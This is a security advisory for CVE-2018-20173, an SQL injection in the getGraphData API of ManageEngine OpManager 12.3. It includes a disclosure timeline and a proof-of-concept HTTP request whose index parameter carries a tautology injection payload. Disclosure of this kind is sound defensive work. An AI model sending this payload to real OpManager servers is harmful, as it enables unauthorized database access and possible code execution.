Zoho ManageEngine OpManager versions 12.3 before 123238 suffer from a remote SQL injection vulnerability in the getGraphData API.
I. VULNERABILITY
-------------------------
Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection
via the getGraphData API.
II. CVE REFERENCE
-------------------------
CVE-2018-20173
III. VENDOR
-------------------------
https://www.manageengine.com
IV. TIMELINE
-------------------------
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
17/12/2018 OPManager replay that they fixed
V. CREDIT
-------------------------
Murat Aydemir from Biznet Bilisim A.S.
VI. DESCRIPTION
-------------------------
ManageEngine OPManager product(version 12.3) was vulnerable to SQL
Injection attacks. A successfully exploit of this attack could allow
arbitrary code execution or unauthenticated access in databases
information.
References: https://www.manageengine.com/network-monitoring/help/read-me.html
https://bugbounty.zoho.com/bb/info#hof
VII. PoC
-------------------------
GET /api/json/v2/device/getGraphData?name=192.168.252.150&policyName=WMI-MemoryUtilization&index=WMI-MemoryUtilization10376381'%20or%20'11'%3d'11&period=Today&withMMA=true&apiKey=XXXXXXXXXX&_=1539935355622
HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost.com/apiclient/ember/index.jsp
OPMCurrentRoute:
http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FInventory%2FSnapshot%2FMonitoringDevice%2F192.168.252.150%2FPerfGraph%2FWMI-MemoryUtilization%2FWMI-MemoryUtilization
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=XXXXXXXXXXX; encryptPassForAutomaticSignin=XXXXXXX;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator; NFA__SSO=XXXXXXXXX;
opmcsrfcookie=XXXXXXXXX
DNT: 1
Connection: close
--
# 0day.today [2018-12-18] #